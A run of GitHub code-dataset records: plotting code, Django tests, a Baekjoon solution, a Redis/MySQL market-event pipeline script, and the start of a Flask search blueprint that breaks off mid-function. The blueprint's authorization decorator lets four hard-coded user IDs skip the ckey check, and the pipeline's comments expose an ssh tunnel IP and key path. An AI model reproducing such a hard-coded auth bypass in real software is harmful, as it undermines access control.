cm.ScalarMappable(cmap=\"Blues\").to_rgba(Lengths[:,:,0])\n ax1.plot_surface(ViewPoints[:,:,0], ViewPoints[:,:,1],ViewPoints[:,:,2],rstride=1,cstride=1,facecolors=colors)\n plt.show()\n plt.close()\n fig = plt.figure()\n ax1 = plt.axes(projection=\"3d\")\n plt.title(\"Apparent Lengths\")\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.set_zlabel('z')\n colors = cm.ScalarMappable(cmap=\"Reds\").to_rgba(Lengths[:,:,1])\n ax1.plot_surface(ViewPoints[:,:,0], ViewPoints[:,:,1],ViewPoints[:,:,2],rstride=1,cstride=1,facecolors=colors)\n plt.show()\n plt.close()\n fig = plt.figure()\n ax1 = plt.axes(projection=\"3d\")\n plt.title(\"Apparent Length Delta\")\n ax1.set_xlabel('x')\n ax1.set_ylabel('y')\n ax1.set_zlabel('z')\n colors = cm.ScalarMappable(cmap=\"seismic\").to_rgba(surprise[:,:,0])\n ax1.plot_surface(ViewPoints[:,:,0], ViewPoints[:,:,1],ViewPoints[:,:,2],rstride=1,cstride=1,facecolors=colors)\n plt.show()\n plt.close()\n plt.hist(Lengths[:,:,0].reshape(N_view*N_view), bins=100, alpha=0.5, color='blue', density=True)\n plt.show()\n plt.close()\n plt.hist(Lengths[:,:,1].reshape(N_view*N_view), bins=100, alpha=0.5, color='red', density=True)\n plt.show()\n plt.close()\n plt.hist(surprise[:,:,0].reshape(N_view*N_view), bins=100, density=True)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"projection-error/projection-experiment","sub_path":"projection-experiment.py","file_name":"projection-experiment.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37996396581","text":"from django.test import TestCase\nfrom polls.models import Question,Choice\nimport datetime\n\nclass QuestionModelTests(TestCase):\n def test_is_empty(self):\n saved_posts = Question.objects.all()\n self.assertEqual(saved_posts.count(), 0)\n \n def test_is_count_one(self):\n question = Question(question_text='test_question',pub_date= datetime.datetime.now())\n question.save()\n saved_posts = Question.objects.all()\n self.assertEqual(saved_posts.count(), 1)\n\n # def test_saving_and_retrieving_post(self):\n # question = Question()\n # question_text = 'test_question_to_retrieve'\n # question.question_text = question_text\n # question.save()\n\n # saved_posts = Question.objects.all()\n # actual_post = saved_posts[0]\n\n # self.assertEqual(actual_post.question_text, question_text)\n\nclass ChoiceModelTests(TestCase):\n def test_is_empty(self):\n saved_posts = Choice.objects.all()\n self.assertEqual(saved_posts.count(), 0)\n \n # def test_is_count_one(self):\n # choice = Choice(question_id=question_id,choice_text='test_question',votes=0)\n # choice.save()\n # saved_posts = Choice.objects.all()\n # self.assertEqual(saved_posts.count(), 1)\n\n # def test_saving_and_retrieving_post(self):\n # choice = Choice()\n # choice_text = 'test_choice_to_retrieve'\n # choice.choice_text = choice_text\n # choice.save()\n\n # saved_posts = Choice.objects.all()\n # actual_post = saved_posts[0]\n\n # self.assertEqual(actual_post.choice_textt, choice_text)","repo_name":"daichi0918/django_polls_keroz","sub_path":"app/polls/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28095620237","text":"import sys\nsys.stdin = open('./input.txt', 'r')\ninput=sys.stdin.readline;\n\nans = 0\nX = 0\nY = 0\n\narr = []\nfor _ in range(9):\n arr.append(list(map(int, input().split())))\n\nfor i in range(9):\n for j in range(9):\n if arr[i][j] > ans: \n ans = arr[i][j]\n X = i + 1\n Y = j + 1\nprint(ans)\nprint(X, Y)","repo_name":"Paperkeem/Algorithm-baekjoon","sub_path":"수학/b2566/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33817551476","text":"import time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport numpy as np\nimport TimeSeriesEvents\nimport MSig_Functions as MSig\nimport sys,os\nimport argparse\nfrom typing import List\nimport redis\nimport threading\n\nMSIG_OUTPUT=\"msig:output\"\nif \"MSIG_MYSQL_PASS\" in os.environ:\n MSIG_MYSQL_PASS=os.environ[\"MSIG_MYSQL_PASS\"]\nelse:\n print(\"Unable to read environment variable MSIG_MYSQL_PASS...\")\n MSIG_MYSQL_PASS=\"\"\n_=np.seterr(all=\"ignore\")\ndef get_cli_parser() -> argparse.ArgumentParser:\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\n '--period',\n type=int,\n default=600,\n help=\"period of signal processing in sec. 300 --> analyze data for every 5 min.\"\n )\n parser.add_argument(\n '--L2fileName',\n type=str,\n default='finL2Extension.graphml',\n help='L2 file for symbols and company names'\n )\n parser.add_argument(\n '--redis_host',\n type=str,\n default='localhost',\n help='redis host for input time series'\n )\n parser.add_argument(\n '--redis_port',\n type=int,\n default=6381,\n help='redis port for input time series'\n )\n parser.add_argument(\n '--msig_host',\n type=str,\n default='localhost',\n help='redis host for signal output'\n )\n parser.add_argument(\n '--msig_port',\n type=int,\n default=6379,\n help='redis port for signal output'\n )\n parser.add_argument(\n '--mind_host',\n type=str,\n default='localhost',\n help='redis host for index output'\n )\n parser.add_argument(\n '--mind_port',\n type=int,\n default=6378,\n help='redis port for index output'\n )\n parser.add_argument(\n '--from_time',\n type=int,\n default=0,\n help='end of data analysis interval for time series. This is the larger one. 0 means now'\n )\n parser.add_argument(\n '--to_time',\n type=int,\n default=-1,\n help='start of data analysis interval for time series. This is the larger one. -1 means the oldest time stamps available'\n )\n parser.add_argument(\n '--prefix',\n type=str,\n default='rts1:01:',\n help='prefix of the keys of interest on redis'\n )\n parser.add_argument(\n '--aggregation_type',\n type=str,\n default='last',\n help='time series aggregation type (min, max, avg, first, last...)'\n )\n parser.add_argument(\n '--bucket_size_msec',\n type=int,\n default=60000,\n help='aggregation bucket size in msec for time series'\n )\n parser.add_argument(\n '--num_regimes',\n type=int,\n default=20,\n help='max number of semantic segmentation per time series for MP'\n )\n parser.add_argument(\n '--window_size',\n type=int,\n default=10,\n help='window size fr semantic segmentation of time series for MP. When MP disabled, this is the parameter for percent-change-based gain and loss index.'\n )\n parser.add_argument(\n '--last_batch_control_variable',\n type=str,\n default=\"mac_simlooping\",\n help='this variable marks if this is end'\n )\n parser.add_argument(\n '--filters',\n type=str,\n default=\"SYMSET=ACTIVE_VOLUME,SYMSET=ACTIVE_PRICE\",\n help='Filtering labels for redis mrange bulk reading'\n )\n parser.add_argument(\n '--ts_freq_threshold',\n type=int,\n default=20,\n help='threshold value for number of simultaneous regime changes for event detection'\n )\n parser.add_argument(\n '--peek_ratio',\n type=float,\n default=0.30,\n help='threshold value for peeks on histogram for event detection'\n )\n parser.add_argument(\n '--enablePlotting',\n default=False,\n help='Enable plotting of histograms and events.',\n action='store_true',\n dest='enablePlotting'\n )\n parser.add_argument(\n '--killMSig',\n default=False,\n help='Signal to kill MSig.',\n action='store_true',\n dest='killMSig'\n )\n parser.add_argument(\n '--enableSectorIndustry',\n default=True,\n help='Enable sector and industry-based anaysis of events.',\n action='store_false',\n dest='enableSectorIndustry'\n )\n parser.add_argument(\n '--enablePrediction',\n default=False,\n help='Enable prediction based on event analysis.',\n action='store_true',\n dest='enablePrediction'\n )\n parser.add_argument(\n '--enableNewsGeneration',\n default=True,\n help='Enable news generation based on event analysis.',\n action='store_false',\n dest='enableNewsGeneration'\n )\n parser.add_argument(\n '--saveToMysql',\n default=True,\n help='Enable to save session info and events to MYSql.',\n action='store_false',\n dest='saveToMysql'\n )\n parser.add_argument(\n '--mysql_port',\n type=int,\n default=3307,\n help='mysql port for signal output'\n )\n parser.add_argument(\n '--mysql_host',\n type=str,\n default='127.0.0.1',\n help='mysql host for signal output'\n )\n parser.add_argument(\n '--mysql_user',\n type=str,\n default='root',\n help='mysql user for signal output'\n )\n parser.add_argument(\n '--mysql_db',\n type=str,\n default='msig',\n help='mysql database for signal output'\n )\n parser.add_argument(\n '--mysql_pass',\n type=str,\n default=MSIG_MYSQL_PASS,\n help='mysql password for signal output. Default is set to the environment variable $MSIG_MYSQL_PASS'\n )\n parser.add_argument(\n '--enableMP',\n default=False,\n help='Enable using matrix profile based event generation. When disabled, gain loss indices are used.',\n action='store_true',\n dest='enableMP'\n )\n parser.add_argument(\n '--isLive',\n default=True,\n help='Parameter to make sure this port is love data port',\n action='store_false',\n dest='isLive'\n )\n parser.add_argument(\n '--enableCorrelations',\n default=True,\n help='Enable pushing correlation plots to the front end. Event correlations are pushed at each computation. Industries are daily',\n action='store_false',\n dest='enableCorrelations'\n )\n parser.add_argument(\n '--gainLossEventRatio',\n type=float,\n default=0.05,\n help='If a peak\\'s height is grater/smaller than this ratio, it is an event' \n )\n parser.add_argument(\n '--gainLossIndicatorThreshold',\n type=float,\n default=0.025,\n help='If a company\\'s gain/loss is larger/smaller than this ratio, it is an indicator of that event' \n )\n parser.add_argument(\n '--timeZone',\n type=str,\n default='US/Pacific',\n help='Time zone of the context' \n )\n parser.add_argument(\n '--curatedNews',\n type=str,\n default='USA Political, Bitcoin, Covid-19',\n help='Topics for curated news' \n )\n return parser\n\n#MAIN LOOP\ndef main(args: List[str],isLoopOnce=False) -> None:\n import json\n import distutils\n from datetime import datetime, timedelta\n import time\n import pytz\n year=0\n month=0\n hour=0\n day=0\n minute=0\n x=datetime.today()\n isStartofDay=False\n parser = get_cli_parser()\n cli_options = parser.parse_args(args)\n cli_options.window_size=[cli_options.window_size]\n #cli_options.filters=[cli_options.filters]\n is_system_start=True \n process_period=cli_options.period\n redis_msig=redis.Redis(host=cli_options.msig_host,port=cli_options.msig_port)\n #SIGNAL GENERATION LOOP\n loop_num=0\n msig_clock=time.time()\n while(True):\n #Set or read default parameters from/to msig_redis\n if(is_system_start):\n #TODO: Add all parameters here for dynamic controlling\n print(\"1. LOOP BEGINS. Keep an eye on 'msig' database @ mysql...\")\n _=redis_msig.set('msig:param:period',int(cli_options.period)) #Event detection period\n _=redis_msig.set('msig:param:num_regimes',int(cli_options.num_regimes)) #number of max regime changes\n _=redis_msig.set('msig:param:window_size',str(cli_options.window_size).encode('utf-8')) #window size for sem seg\n _=redis_msig.set('msig:param:peek_ratio',cli_options.peek_ratio) #Peek ratio for event detection on histograms\n _=redis_msig.set('msig:param:ts_freq_threshold',cli_options.ts_freq_threshold) #Threshold value for num of reg changes for event detection on histograms\n _=redis_msig.set('msig:param:enableSectorIndustry',str(cli_options.enableSectorIndustry)) #Bool var if sector and industry analysis is required\n _=redis_msig.set('msig:param:bucket_size_msec',int(cli_options.bucket_size_msec)) #aggregation bucket size\n _=redis_msig.set('msig:param:aggregation_type',str(cli_options.aggregation_type)) #aggregation type\n _=redis_msig.set('msig:param:enableCorrelations',str(cli_options.enableCorrelations)) #aggregation bucket size\n _=redis_msig.set('msig:param:enableMP',str(cli_options.enableMP)) #aggregation bucket size\n _=redis_msig.set('msig:param:enableNewsGeneration',str(cli_options.enableNewsGeneration)) #aggregation bucket size\n _=redis_msig.set('msig:param:enablePlotting',str(cli_options.enablePlotting)) #aggregation bucket size\n _=redis_msig.set('msig:param:enablePrediction',str(cli_options.enablePrediction)) #aggregation bucket size\n _=redis_msig.set('msig:param:enableSectorIndustry',str(cli_options.enableSectorIndustry)) #aggregation bucket size\n _=redis_msig.set('msig:param:from_time',int(cli_options.from_time)) #aggregation bucket size\n _=redis_msig.set('msig:param:to_time',int(cli_options.to_time)) #aggregation bucket size\n _=redis_msig.set('msig:param:gainLossEventRatio',cli_options.gainLossEventRatio) #aggregation bucket size\n _=redis_msig.set('msig:param:gainLossIndicatorThreshold',cli_options.gainLossIndicatorThreshold) #aggregation bucket size\n _=redis_msig.set('msig:param:saveToMysql',str(cli_options.saveToMysql)) \n _=redis_msig.set('msig:param:killMSig',str(cli_options.killMSig)) \n _=redis_msig.set('msig:param:isLive',str(cli_options.isLive)) \n _=redis_msig.set('msig:param:curatedNews',str(cli_options.curatedNews)) \n loop_num=loop_num+1\n else:\n cli_options.period=int(redis_msig.get('msig:param:period'))\n cli_options.num_regimes=int(redis_msig.get('msig:param:num_regimes'))\n cli_options.window_size=list(map(int,redis_msig.get('msig:param:window_size').decode('utf-8')[1:-1].split(',')))\n cli_options.peek_ratio=float(redis_msig.get('msig:param:peek_ratio'))\n cli_options.ts_freq_threshold=int(redis_msig.get('msig:param:ts_freq_threshold'))\n cli_options.enableSectorIndustry=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableSectorIndustry').decode('utf-8')))\n cli_options.bucket_size_msec=int(redis_msig.get('msig:param:bucket_size_msec'))\n cli_options.aggregation_type=str(redis_msig.get('msig:param:aggregation_type').decode('utf-8'))\n cli_options.enableCorrelations=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableCorrelations').decode('utf-8')))\n cli_options.enableMP=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableMP').decode('utf-8')))\n cli_options.enableNewsGeneration=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableNewsGeneration').decode('utf-8')))\n cli_options.enablePlotting=bool(distutils.util.strtobool(redis_msig.get('msig:param:enablePlotting').decode('utf-8')))\n cli_options.enablePrediction=bool(distutils.util.strtobool(redis_msig.get('msig:param:enablePrediction').decode('utf-8')))\n cli_options.enableSectorIndustry=bool(distutils.util.strtobool(redis_msig.get('msig:param:enableSectorIndustry').decode('utf-8')))\n cli_options.from_time=int(redis_msig.get('msig:param:from_time'))\n cli_options.to_time=int(redis_msig.get('msig:param:to_time'))\n cli_options.gainLossEventRatio=float(redis_msig.get('msig:param:gainLossEventRatio'))\n cli_options.gainLossIndicatorThreshold=float(redis_msig.get('msig:param:gainLossIndicatorThreshold'))\n cli_options.saveToMysql=bool(distutils.util.strtobool(redis_msig.get('msig:param:saveToMysql').decode('utf-8')))\n cli_options.killMSig=bool(distutils.util.strtobool(redis_msig.get('msig:param:killMSig').decode('utf-8')))\n cli_options.isLive=bool(distutils.util.strtobool(redis_msig.get('msig:param:isLive').decode('utf-8')))\n cli_options.curatedNews=redis_msig.get('msig:param:curatedNews').decode('utf-8')\n if(cli_options.killMSig):\n print(\"Kill signal received\")\n print(\"Bye!\")\n _=redis_msig.set('msig:param:killMSig','False') \n return\n x=datetime.today()\n year=x.year\n month=x.month\n day=x.day\n hour=x.hour\n minute=x.minute\n weekday=x.weekday()\n if(weekday==5):#saturday\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=2)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n print(\"Market is not open. Sleeping until \",future)\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n elif(weekday==6):#sunday\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=1)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n print(\"Market is not open. Sleeping until \",future)\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n else:#weekdays\n if(hour<6 or (hour==6 and minute<41)):\n future=datetime(x.year, x.month, x.day,6,41)\n print(\"Market is not open. Sleeping until \",future)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n elif(hour>13 or (hour==13 and minute>15)):\n if(weekday==4):#friday, sleep 2 days\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=3)\n else:#other weekdays sleep 1 day\n future=datetime(x.year, x.month, x.day,6,41)+timedelta(days=1)\n print(\"Market is closed. Sleeping until \",future)\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n time.sleep((future-x).total_seconds())\n isStartofDay=True\n #If this is the first processing or we have waited long enough for process_period, repeat\n if(is_system_start or time.time()-msig_clock>=process_period):\n start=time.time()\n if(not(is_system_start)):\n loop_num+=1\n print(loop_num, \". LOOP BEGINS:\")\n is_system_start=False\n \n while(True):#Try reading data from mrF\n try:\n all_data=MSig.get_data_from_mrF(redis_host=cli_options.redis_host,redis_port=cli_options.redis_port,\n from_time=cli_options.from_time,to_time=cli_options.to_time,\n query_key=None,prefix=cli_options.prefix,\n aggregation_type=cli_options.aggregation_type,bucket_size_msec=\\\n cli_options.bucket_size_msec,last_batch_control_variable=cli_options.last_batch_control_variable,filters=cli_options.filters)\n \n # if(len(all_data)>0):\n # if(cli_options.isLive):\n # tmp_date=datetime.fromtimestamp(all_data['ts_price_min']/1000).astimezone(pytz.timezone(cli_options.timeZone))\n # if(tmp_date.year != year or tmp_date.year != month or tmp_date.year != day):\n # print(\"Data belongs to\", tmp_date.strftime(\"%Y-%m-%d\"),\". Today is\",x.strftime(\"%Y-%m-%d\"))\n # print(\"Either disable isLive parameter or check your data on Redis.TERMINATING...\")\n # return\n break\n except Exception as e:\n print(e)\n print(\"sleeping for\",process_period,\"sec. before trying again\")\n time.sleep(process_period)\n \n if(cli_options.enableMP):\n print(\"Using Matrix Profile algorithm...\")\n #GET REGIME CHANGES\n print(\"Performing semantic segmentation of prices...\")\n df_regimes_price=MSig.get_regime_changes(all_data[\"df_price_data\"],num_regimes=cli_options.num_regimes,windows=cli_options.window_size[0])\n print(\"Performing semantic segmentation of volumes...\")\n df_regimes_volume=MSig.get_regime_changes(all_data[\"df_volume_data\"],num_regimes=cli_options.num_regimes,windows=cli_options.window_size[0])\n #GET HISTOGRAMS\n print(\"Producing histogram of regime changes for prices...\")\n histogram_price=MSig.getHistogramFromUnalignedDf(df_regimes_price,all_data[\"ts_price\"],all_data[\"ts_price_min\"],all_data[\"ts_price_max\"],cli_options.bucket_size_msec,window_size=cli_options.window_size[0])\n print(\"Producing histogram of regime changes for volumes...\")\n histogram_volume=MSig.getHistogramFromUnalignedDf(df_regimes_volume,all_data[\"ts_volume\"],all_data[\"ts_volume_min\"],all_data[\"ts_volume_max\"],cli_options.bucket_size_msec,window_size=cli_options.window_size[0])\n #Plotting\n all_ts_price=list(range(all_data[\"ts_price_min\"], all_data[\"ts_price_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n date_time_stamps=[datetime.fromtimestamp(i/1000) for i in all_ts_price]\n if(cli_options.enablePlotting):\n print(\"Attempting to plot histograms visually...\")\n plt.title(\"Histogram of price regime changes\")\n markerline, stemlines, baseline = plt.stem(date_time_stamps,histogram_price,markerfmt=\" \")\n plt.figure()\n all_ts_volume=list(range(all_data[\"ts_volume_min\"], all_data[\"ts_volume_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n date_time_stamps=[datetime.fromtimestamp(i/1000) for i in all_ts_volume]\n if(cli_options.enablePlotting):\n plt.title(\"Histogram of volume regime changes\")\n markerline, stemlines, baseline = plt.stem(date_time_stamps,histogram_volume,markerfmt=\" \")\n #Detect events\n events_price=TimeSeriesEvents.getCandidateEvents(histogram_price,len(all_ts_price),ts_freq_threshold=cli_options.ts_freq_threshold,peek_ratio=cli_options.peek_ratio,sampling_rate=cli_options.bucket_size_msec)\n events_volume=TimeSeriesEvents.getCandidateEvents(histogram_volume,len(all_ts_volume),ts_freq_threshold=cli_options.ts_freq_threshold,peek_ratio=cli_options.peek_ratio,sampling_rate=cli_options.bucket_size_msec)\n print(events_price)\n print(events_volume)\n #plot events\n if(cli_options.enablePlotting):\n print(\"Attempting to plot events visually ...\")\n p1=MSig.plotMSigEvents(len(all_ts_price),histogram_price,events_price,\"Price Events\",cli_options.bucket_size_msec)\n p1.figure()\n p2=MSig.plotMSigEvents(len(all_ts_volume),histogram_volume,events_volume,\"Volume Events\",cli_options.bucket_size_msec)\n p2.show()\n #indicators\n #all_data[\"ts_volume_min\"], all_data[\"ts_volume_max\"]\n indicators_price=MSig.getIndicators(all_data,events_price,df_regimes_price,all_data[\"ts_price_min\"],all_data[\"ts_price_max\"],\"ts_price\",\"df_price_data\",cli_options.bucket_size_msec)\n indicators_volume=MSig.getIndicators(all_data,events_volume,df_regimes_volume,all_data[\"ts_volume_min\"],all_data[\"ts_volume_max\"],\"ts_volume\",\"df_volume_data\",cli_options.bucket_size_msec)\n #get market capitals per event\n df_market_capital_price=MSig.getMarketCapitalPerEvent(all_ts_price,all_data,events_price,indicators_price)\n df_market_capital_volume=MSig.getMarketCapitalPerEvent(all_ts_volume,all_data,events_volume,indicators_volume)\n else:\n if(len(all_data)==0):\n print(\"There is no data to process from Mr. F\")\n return\n print(\"Calculating events & indicators based on gain/loss\")\n isThreadRunning=True\n sleep_count=0\n while(isThreadRunning):\n try:\n sleep_count=sleep_count+1\n events_price_gain,events_price_loss, events_volume_gain, events_volume_loss,indicators_price_gain,indicators_price_loss, indicators_volume_gain, indicators_volume_loss=MSig.getEventsFromGainLoss(all_data,cli_options.window_size[0],cli_options.enablePlotting,cli_options.gainLossEventRatio,cli_options.gainLossIndicatorThreshold,cli_options.mind_host,cli_options.mind_port,cli_options.bucket_size_msec,all_data[\"ts_price_min\"],cli_options.prefix,cli_options.L2fileName) \n isThreadRunning=False\n if(sleep_count==5):isThreadRunning=False\n except Exception as e:\n print(e)\n print(\"sleeping for 30 seconds to make sure thread safe\")\n time.sleep(30)\n all_ts_price=list(range(all_data[\"ts_price_min\"], all_data[\"ts_price_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n df_market_capital_price_gain=MSig.getMarketCapitalPerEvent(all_ts_price,all_data,events_price_gain,indicators_price_gain)\n df_market_capital_price_loss=MSig.getMarketCapitalPerEvent(all_ts_price,all_data,events_price_loss,indicators_price_loss)\n all_ts_volume=list(range(all_data[\"ts_volume_min\"], all_data[\"ts_volume_max\"]+cli_options.bucket_size_msec,cli_options.bucket_size_msec))\n df_market_capital_volume_gain=MSig.getMarketCapitalPerEvent(all_ts_volume,all_data,events_volume_gain,indicators_volume_gain)\n df_market_capital_volume_loss=MSig.getMarketCapitalPerEvent(all_ts_volume,all_data,events_volume_loss,indicators_volume_loss)\n print(\"Numbers for events_price_gain={},events_price_loss={}, events_volume_gain={}, events_volume_loss={}\".format(len(events_price_gain),len(events_price_loss),len(events_volume_gain),len(events_volume_loss)))\n events_price=pd.concat([events_price_gain,events_price_loss],axis=0).reset_index(drop=True)\n events_volume=pd.concat([events_volume_gain,events_volume_loss],axis=0).reset_index(drop=True)\n indicators_price=pd.concat([indicators_price_gain,indicators_price_loss],axis=0).reset_index(drop=True)\n indicators_volume=pd.concat([indicators_volume_gain,indicators_volume_loss],axis=0).reset_index(drop=True)\n if(len(df_market_capital_price_gain)>0 and len(df_market_capital_price_loss)>0):\n df_market_capital_price_loss[\"event_number\"]+=max(df_market_capital_price_gain[\"event_number\"])\n df_market_capital_price=pd.concat([df_market_capital_price_gain,df_market_capital_price_loss],axis=0).reset_index(drop=True)\n if(len(df_market_capital_volume_gain)>0 and len(df_market_capital_volume_loss)>0):\n df_market_capital_volume_loss[\"event_number\"]+=max(df_market_capital_volume_gain[\"event_number\"])\n df_market_capital_volume=pd.concat([df_market_capital_volume_gain,df_market_capital_volume_loss],axis=0).reset_index(drop=True)\n\n #sector industry analysis\n df_sectors_price=pd.DataFrame()\n df_industries_price=pd.DataFrame()\n df_sectors_volume=pd.DataFrame()\n df_industries_volume=pd.DataFrame()\n if(cli_options.enableSectorIndustry):\n print(\"Analyzing sectors and industries ...\")\n df_sectors_price,df_industries_price=MSig.getSectorIndustryPerEvent(indicators_price,\"finL2Extension.graphml\")\n df_sectors_volume,df_industries_volume=MSig.getSectorIndustryPerEvent(indicators_volume,\"finL2Extension.graphml\")\n\n #Send signal data to Redis\n print(\"Preparing data for News generation and MSig database...\")\n msig_data={\"loop_num\":loop_num,\"ts_price\":all_data[\"ts_price\"],\"ts_volume\":all_data[\"ts_volume\"],\\\n \"events_price\":events_price,\"events_volume\":events_volume,\\\n \"indicators_price\":indicators_price,\"indicators_volume\":indicators_volume,\\\n \"df_sectors_price\":df_sectors_price,\"df_industries_price\":df_industries_price,\\\n \"df_sectors_volume\":df_sectors_volume,\"df_industries_volume\":df_industries_volume,\\\n \"df_market_capital_price\":df_market_capital_price,\"df_market_capital_volume\":df_market_capital_volume, \\\n \"ts_price_min\":all_data[\"ts_price_min\"],\"ts_price_max\":all_data[\"ts_price_max\"],\"ts_volume_min\":all_data[\"ts_volume_min\"],\"ts_volume_max\":all_data[\"ts_volume_max\"]}\n #_=redis_msig.rpush(MSIG_OUTPUT,pickle.dumps(msig_data))\n if(len(events_price)>0 or len(events_volume)>0):\n #TODO! sendToMYsql is slow. work on optimizing it.\n #Generate news signal\n if(cli_options.enableNewsGeneration):\n print(\"Generating news...\")\n try:\n MSig.sendNewsToFrontEnd(msig_data,cli_options,df_market_capital_price,df_market_capital_volume,num_events_price_gain=len(events_price_gain),num_events_volume_gain=len(events_volume_gain),isStartofDay=isStartofDay)\n print(\"Done\")\n except Exception as e:\n print(e)\n if(cli_options.saveToMysql):\n try:\n event_price_ids,event_volume_ids=MSig.sendToMysql(msig_data,cli_options.mysql_host,cli_options.mysql_port,cli_options.mysql_db,cli_options.mysql_user,cli_options.mysql_pass)\n except Exception as e:\n print(e)\n pass\n else:\n event_price_ids=[]\n event_volume_ids=[]\n #Generate prediction signal\n if(cli_options.enablePrediction):\n print(\"Triggering MModel for predictive models based on this batch...\")\n mmodel_data={\"events_price\":events_price.to_dict(),\"events_volume\":events_volume.to_dict(),\"event_volume_ids\":event_volume_ids,\\\n \"event_price_ids\":event_price_ids,\"price_columns\":list(all_data[\"df_price_data\"].columns),\\\n \"volume_columns\":list(all_data[\"df_volume_data\"].columns), \"regimes_price\":df_regimes_price.to_dict(),\\\n \"regimes_volume\":df_regimes_volume.to_dict(),\"ts_price_min\":all_data[\"ts_price_min\"],\"ts_price_max\":all_data[\"ts_price_max\"],\"ts_volume_min\":all_data[\"ts_volume_min\"],\\\n \"bucket_size_msec\": cli_options.bucket_size_msec,\"ts_volume_max\":all_data[\"ts_volume_max\"]}\n mmodal_data_serial=json.dumps(mmodel_data)\n _=redis_msig.xadd(MSIG_OUTPUT,{'data':mmodal_data_serial})\n else:\n print(\"No events detected... Not enough data...\")\n msig_clock=time.time()\n end_time=time.time()\n if((len(events_price)>0 or len(events_volume)>0) and cli_options.saveToMysql):\n print(\"Saving the session parameters...\")\n MSig.saveSessionInfo(event_price_ids,event_volume_ids,cli_options,start*1000,end_time*1000)\n print(loop_num, \". loop took\",end_time-start,\"sec. Not bad?\")\n\n else:\n if(isLoopOnce):return\n is_system_start=False\n print(\"Sleeping until the next period starts in\",process_period,\"sec. Now your chance to change any parameters on msig redis. Don't kill me if parallel threads are running.\\n\")\n print(\"Don't kill me yet. Wait for the Thread to send 'Done' signal!\\n\")\n time.sleep(process_period)\n \n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n# import pickle\n# outfile=open(\"all_data\",'wb')\n# pickle.dump(all_data,outfile)\n# outfile.close()\n#####\n # ports=[item for item in range(6400,6470)]\n # for p in ports:\n # args=[\"--redis_port\",str(p)]\n # main(args,isLoopOnce=True)\n # print(p,\"Done\")\n\n\n#redis_msig.delete(MSIG_OUTPUT)\n\n#x=rts.lrange(\"msig:output\",0,-1)\n#rdcli -h localhost -p 6380\n#ssh -L 6379:localhost:6379 ubuntu@34.223.57.176 -i $HOME\\.ssh\\bastion1.pem\n#ssh -L 6379:localhost:6379 ubuntu@34.223.57.176 -i ~/.ssh/bastion1.pem\n#ssh -L 6380:localhost:6380 ubuntu@34.223.57.176 -i ~/.ssh/bastion1.pem\n# from redistimeseries.client import Client\n# rts = Client(host='localhost', port=6380)\n\n# result=rts.range('rts1:01:symbol:BLKB:price', 0, -1)\n","repo_name":"sametdumankaya/MicroserviceStack","sub_path":"MSig/MSig_start.py","file_name":"MSig_start.py","file_ext":"py","file_size_in_byte":30352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12894290366","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'jingyu.he'\n\nfrom flask import request, jsonify, Blueprint\nimport json\nimport requests\nimport asyncio\nfrom conf.constants import is_check_ckey, auth_ckey_url, if_cached, r_domain\nfrom conf.search_params_define import *\nfrom utils.request_util import RequestUtil\nfrom utils.redis_utils import RedisUtil\nfrom service.search.contact import Contact\nfrom service.search.lookback import Lookback\n\nsearch_blueprint = Blueprint('search', __name__)\n\n# -------------------------- 生成logger --------------------------\nlog_path = get_logger_file(name='search.log')\nsearch_logger = configure_logger('search', log_path)\n\n# -------------------------- 读取默认配置 --------------------------\nif is_check_ckey:\n search_logger.info(\"CKEY AUTHORIZATION INITIALING...\")\n from utils.authorization import check_ckey\n# -------------------------- 既定的配置 --------------------------\n\nip = str()\ns_args = dict()\nl_args = dict()\n\n# -------------------------- 鉴权修饰器 --------------------------\ndef authorization(func):\n def wrapper(*args, **kw):\n ckey = ''\n user_id = 'DEFAULT'\n user = ''\n request_util = RequestUtil()\n res = False\n __args = request_util.get_request_args(request)\n user_id = __args.get('qtalkId', 'UNKOWN')\n user_domain = None\n if '@' in user_id:\n _user = user_id.split('@')\n user = _user[0]\n user_domain = _user[1]\n else:\n user = user_id\n if isinstance(r_domain, str):\n user_domain = r_domain\n user_id = user_id + '@' + user_domain\n if user_id in ['guanghui.yang@ejabhost1','jingyu.he@ejabhost1','chaos.dong@ejabhost1','binz.zhang@ejabhost1']:\n return func(user_id=user_id, args=__args, *args, **kw)\n elif is_check_ckey:\n ckey = request_util.get_ckey(request)\n if ckey:\n if auth_ckey_url:\n try:\n r_data = {\n 'ckey': ckey,\n 'system': 'search'\n }\n ret = requests.post(url=auth_ckey_url, json=r_data)\n \"\"\"{\n \"ret\": true,\n \"errcode\": 0,\n \"errmsg\": \"\",\n \"data\": {\n \"d\": \"qtalk.test.org\",\n 